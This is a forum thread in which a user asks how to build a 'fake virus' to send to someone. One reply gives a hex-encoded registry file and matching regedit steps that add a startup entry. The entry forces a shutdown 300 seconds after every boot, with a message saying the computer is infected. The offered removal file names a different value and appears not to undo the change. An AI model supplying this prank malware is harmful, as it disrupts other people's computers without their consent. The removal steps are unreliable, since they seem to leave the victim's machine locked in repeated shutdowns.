|
|
![]() |
| Thread Tools | Search this Thread |
#1
| |||
| |||
Creating a false virus Hi all, I would like to know how to set up a fake virus and can be sent to someone ... FALSE This virus will be, I think not very developed but just to display a message on the screen of the person. PS: I just learned C (M @ to Chapter 2) Thank you all |
#2
| |||
| |||
Re: Creating a false virus Well, I'll be more specific I'd like to send this "fake virus" to someone and I would like to include some little thing like being on display window (type error message) and if it can not can close it too easily (as if he could only click "OK" for example ) And also when appuit this button and another message appears . |
#3
| |||
| |||
Re: Creating a false virus Well, I know this is not exactly what you want but it just always help : http://www.metacafe.com/watch/673387/make_a_fake_virus/ http://www.youtube.com/watch?v=lpyMWmkFIbg |
#4
| |||
| |||
Re: Creating a false virus This tutorial will help a user to create a fake virus???which will force the system to restart or shutdown after a specific period of time?? Warning: Use it at your own risk. I'll not be responsible for any kind of damage/problem in your system. Well?.. We all are aware of this program called SHUTDOWN.EXE which allows us to easily create icons to shutdown or restart our computer. Quote: Shutdown [{-l|-s|-r|-a}] [-f] [-m [\\ComputerName]] [-t xx] [-c "message"] [-d[u][p]xx:yy] Parameters -l - Logs off the current user, this is also the defualt. -m ComputerName takes precedence. -s - Shuts down the local computer. -r - Reboots after shutdown. -a - Aborts shutdown. Ignores other parameters, except -l and ComputerName. You can only use -a during the time-out period. -f - Forces running applications to close. -m [\\ComputerName] - Specifies the computer that you want to shut down. -t xx - Sets the timer for system shutdown in xx seconds. The default is 20 seconds. -c "message" - Specifies a message to be displayed in the Message area of the System Shutdown window. You can use a maximum of 127 characters. You must enclose the message in quotation marks. We use this handy shortcut in Creating a Shutdown/Reboot Icon. But this time It will be used for creating a virus???. ==== HOW TO CREATE A VIRUS? Method One Just open Notepad and paste the given code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK. Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Run] "Shell32"=hex(2):25,00,77,00,6 9,00,6e,00,64,00,69,00,72,00,2 5,00,5c,00,73,00,\ 79,00,73,00,74,00,65,00,6d,00, 33,00,32,00,5c,00,73,00,68,00, 75,00,74,00,64,\ 00,6f,00,77,00,6e,00,2e,00,65, 00,78,00,65,00,20,00,2d,00,73, 00,20,00,2d,00,\ 74,00,20,00,33,00,30,00,30,00, 20,00,2d,00,63,00,20,00,22,00, 59,00,6f,00,75,\ 00,72,00,20,00,43,00,6f,00,6d, 00,70,00,75,00,74,00,65,00,72, 00,20,00,69,00,\ 73,00,20,00,69,00,6e,00,66,00, 65,00,63,00,74,00,65,00,64,00, 20,00,77,00,69,\ 00,74,00,68,00,20,00,76,00,69, 00,72,00,75,00,73,00,20,00,40, 00,52,00,6f,00,\ 6e,00,61,00,6b,00,20,00,41,00, 67,00,72,00,61,00,77,00,61,00, 6c,00,22,00,00,\ 00 Restart Your PC to see the Effects. Method Two Click Start > Run. Type regedit and press Enter after Run Window emerges. Go To HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\Curr entVersion\Run Note HKEY_LOCAL_MACHINE This hive contains information about the computer itself, as well as about the operating system. It includes specific details about all hardware, including keyboard, printer ports, storage?the entire hardware setup. In addition, it has information about security, installed software, system startup, drivers, services, and the machine's specific XP configuration. Click on Edit Menu > New > Expanded string value Note Expanded string value data type contains variables that Windows uses to point to the location of files. For example, to point to the location of the Luna theme file, the expanded string value in the Registry is %SystemRoot%\resources\Themes\ Luna.theme. Name the String value as ?Shell32?. Now, Double click on it to and Set its value as %windir%\system32\shutdown.exe -s -t 300 -c "Your Computer is infected with virus @Ronak Agrawal" Restart your PC to see the effects???. ==== HOW TO DELETE THE VIRUS? Just open Notepad and paste the appropriate code and then save the file with the name "Ronak Agrawal .reg" and then run the file. It'll ask for confirmation, simply click on YES and then OK. Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Mi crosoft\Windows\CurrentVersion \Run] "shell"=hex(2):00,00 Restart Your PC to see the Effects. |
![]() |
|
Tags: creating, false, virus |
Thread Tools | Search this Thread |
|
![]() | ||||
Thread | Thread Starter | Forum | Replies | Last Post |
false sense of security & free virus scanners | sObama | Networking & Security | 4 | 11-05-2011 10:04 PM |
False positive virus alert on microsoft security essentials | Tamali | Networking & Security | 5 | 31-10-2010 12:01 AM |
TR/ATRAPS.Gen virus or false warning | Kishan | Networking & Security | 3 | 10-03-2009 07:34 PM |
False Colour | Nazz08 | Hardware Peripherals | 7 | 12-11-2008 03:24 PM |